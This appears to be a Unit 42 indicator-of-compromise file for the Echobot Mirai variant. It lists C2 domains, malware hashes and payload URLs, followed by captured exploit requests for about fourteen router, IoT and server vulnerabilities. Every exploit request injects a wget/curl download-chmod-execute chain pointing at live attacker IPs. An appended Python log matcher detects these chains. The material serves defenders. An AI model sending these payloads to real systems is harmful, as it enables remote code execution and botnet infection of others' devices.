
IOCs for research published at https://unit42.paloaltonetworks.com/mirai-variant-echobot-resurfaces-with-13-previously-unexploited-vulnerabilities/

C2s

akuma[.]pw:17
akumaiotsolutions[.]pw:777

2019-10-28 : Samples hosted at 45.89.106.108

0d2fef6a2a50a9ac3430d1eb435a81d9ae2fe2e6d9949a2fa418d05c49df94f1
71613948d5599215c6cca58c996d95608c8c7163b4f831629453f2a70a69049f
72bb6fd09487111bc0281e1432e8d8e3f58ce279c20e41cec17b2bd91eacf68e

URLs

45.89.106.108/ECHOBOT.mips
45.89.106.108/ECHOBOT.x86
45.89.106.108/ECHOBOT.x86_64

2019-12-03 : Samples hosted at 80.82.67.184

URLs


2019-12-04 : Samples hosted at 80.82.67.209


URLs


2019-11-12 : Samples hosted at 145.249.106.241

URLs


Exploit formats

Columns of the original table: Vulnerability, Affected Devices, Port Scanned, Exploit Format. Each entry below lists them in that order; multi-line entries keep the bot's extra request headers as captured.

CVE-2019-17270
  Affected devices: Yachtcontrol Webservers
  Port scanned: 8081
  Exploit format:
    GET /pages/systemcall.php?command=|wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; sh richard HTTP/1.0

CVE-2019-18396 / CVE-2017-14127
  Affected devices: Technicolor TD5130v2 and Technicolor TD5336 routers
  Port scanned: 161
  Exploit format:
    GET /mnt_ping.cgi?isSubmit=1&addrType=3&pingAddr=;wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; sh richard&send=Send HTTP/1.0

AVCON6 Remote Code Execution
  Affected devices: AVCON6 video conferencing systems
  Port scanned: 8080
  Exploit format:
    POST /login.action?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{%22cd /tmp; wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; ./richard%22})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1

CVE-2019-16072
  Affected devices: Enigma Network Management Systems v65.0.0
  Port scanned: 80
  Exploit format:
    POST /cgi-bin/protected/discover_and_manage.cgi?action=snmp_browser&hst_id=none&snmpv3_profile_id=&ip_address=|cd /tmp; wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; ./richard;/evil.php|php&snmp_ro_string=public&mib_oid=system&mib_oid_manual=.1.3.6.1.2.1.1&snmp_version=1 HTTP/1.1
    Host: %s:80
    {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Referer": "http://%s/cgi-bin/protected/discover_and_manage.cgi?action=snmp_browser", "Connection": "close", "Upgrade-Insecure-Requests": "1"}

CVE-2019-14931
  Affected devices: Mitsubishi Electric smartRTU & INEA ME-RTU
  Port scanned: 80
  Exploit format:
    GET /action.php HTTP/1.1
    Host: %s:80
    {'host' : ';cd /tmp; wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; ./richard&PingCheck=Test'}

Sar2HTML Remote Code Execution
  Affected devices: Sar2HTML plotting tool for Linux servers, v3.2.1
  Port scanned: 80
  Exploit format:
    GET /index.php?plot=;cd /tmp; wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; ./richard HTTP/1.1

CVE-2017-16602
  Affected devices: NetGain Systems Enterprise Manager
  Port scanned: 8081
  Exploit format:
    POST /u/jsp/tools/exec.jsp?command=cmd+%2Fc+ping&argument=wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; sh richard+%7C+whoami&async_output=ping1487856455258&isWindows=true HTTP/1.0

CVE-2017-6316
  Affected devices: Citrix NetScaler SD-WAN 9.1.2.26.561201 devices
  Port scanned: 443
  Exploit format:
    POST /global_data/ HTTP/1.1
    Host: %s:443
    Connection:close
    Cookie:CGISESSID=e6f1106605b5e8bee6114a3b5a88c5b4`cd /tmp; wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; ./richard`; APNConfigEditorSession=0qnfarge1v62simtqeb300lkc7;

CVE-2013-5912
  Affected devices: Thomson Reuters Velocity Analytics Vhayu Analytic Servers 6.94 build 2995
  Port scanned: 80
  Exploit format:
    GET /VhttpdMgr?action=importFile&fileName=cd /tmp; wget http://45.89.106.108/richard; curl -O http://45.89.106.108/richard; chmod +x richard; ./richard HTTP/1.1

ACTi ASOC2200 Remote Code Execution
  Affected devices: ACTi ASOC 2200 Web Configurators versions 2.6 and prior
  Port scanned: 80
  Exploit format:
    GET /cgi-bin/test?iperf=;cd /tmp; wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; ./richard HTTP/1.1

3Com Office Connect Remote Code Execution
  Affected devices: 3Com OfficeConnect routers
  Port scanned: 80
  Exploit format:
    GET /utility.cgi?testType=1&IP=aaa || cd /tmp; wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; ./richard HTTP/1.1

CVE-2006-4000
  Affected devices: Barracuda Spam Firewall versions 3.3.x
  Port scanned: 80
  Exploit format:
    GET /cgi-bin/preview_email.cgi?file=/mail/mlog/|cd; /tmp; wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; ./richard HTTP/1.1

CCBill Remote Code Execution
  Affected devices: CCBill Online Payment Systems
  Port scanned: 80
  Exploit formats (two paths are tried):
    GET /ccbill/whereami.cgi?g=cd /tmp; wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; ./richard HTTP/1.1
    GET /cgi-bin/ccbill/whereami.cgi?g=cd /tmp; wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; ./richard HTTP/1.1
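A defender-side check, added here and not part of the Unit 42 IOC file: a small Python matcher that flags web-server request lines carrying the fetch-and-execute chain shared by every exploit format above, or targeting one of the listed endpoints with its injected parameter. The regex, the endpoint-to-parameter map and the SAMPLE_LOG lines are my own constructions, not the bot's code.

```python
"""Added example (not part of the Unit 42 IOC file): flag request lines that
carry the ECHOBOT fetch-and-execute chain or hit an endpoint listed above.
The regex and endpoint map are my own; SAMPLE_LOG lines are constructed."""
import re
from urllib.parse import unquote

# Chain common to every exploit format above: wget/curl to an IP-hosted
# file, chmod +x, then execution via "sh <file>" or "./<file>".
FETCH_CHAIN = re.compile(
    r"(?:wget|curl\s+-O)\s+https?://(\d{1,3}(?:\.\d{1,3}){3})/(\S+?)[;\s&]"
    r".*?chmod\s+\+x\s+\S+.*?(?:\bsh\s+\S+|\./\S+)", re.I | re.S)

# Vulnerable path -> parameter the command is injected into (from the
# exploit formats above); both must be present to report an endpoint hit.
EXPLOITED_ENDPOINTS = {
    "/pages/systemcall.php": "command",   # CVE-2019-17270
    "/mnt_ping.cgi": "pingAddr",          # CVE-2019-18396 / CVE-2017-14127
    "/cgi-bin/test": "iperf",             # ACTi ASOC2200
    "/utility.cgi": "IP",                 # 3Com OfficeConnect
    "/ccbill/whereami.cgi": "g",          # CCBill
    "/index.php": "plot",                 # Sar2HTML
}

def inspect_request(line):
    """Return a dict describing why the line is suspicious, or None."""
    decoded = unquote(line)  # also catches percent-encoded variants
    finding = {}
    m = FETCH_CHAIN.search(decoded)
    if m:
        finding["payload_host"], finding["payload_name"] = m.group(1), m.group(2)
    for path, param in EXPLOITED_ENDPOINTS.items():
        if path in decoded and param + "=" in decoded:
            finding["endpoint"], finding["injected_param"] = path, param
            break
    return finding or None

def scan(lines):
    """Run inspect_request over request lines and keep the hits."""
    return [(l, f) for l in lines if (f := inspect_request(l))]

# Constructed sample: two requests matching the formats above, one benign.
SAMPLE_LOG = [
    "GET /cgi-bin/test?iperf=;cd /tmp; wget http://145.249.106.241/richard; "
    "curl -O http://145.249.106.241/richard; chmod +x richard; ./richard HTTP/1.1",
    "GET /pages/systemcall.php?command=|wget http://145.249.106.241/richard; "
    "curl -O http://145.249.106.241/richard; chmod +x richard; sh richard HTTP/1.0",
    "GET /index.php?page=home HTTP/1.1",
]
```

The payload host extracted from a hit can be compared against the IOC addresses above; the endpoint map is deliberately limited to paths whose parameter name is distinctive enough to keep false positives low.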

Other exploits in this variant have been mentioned in previous publications here and here.
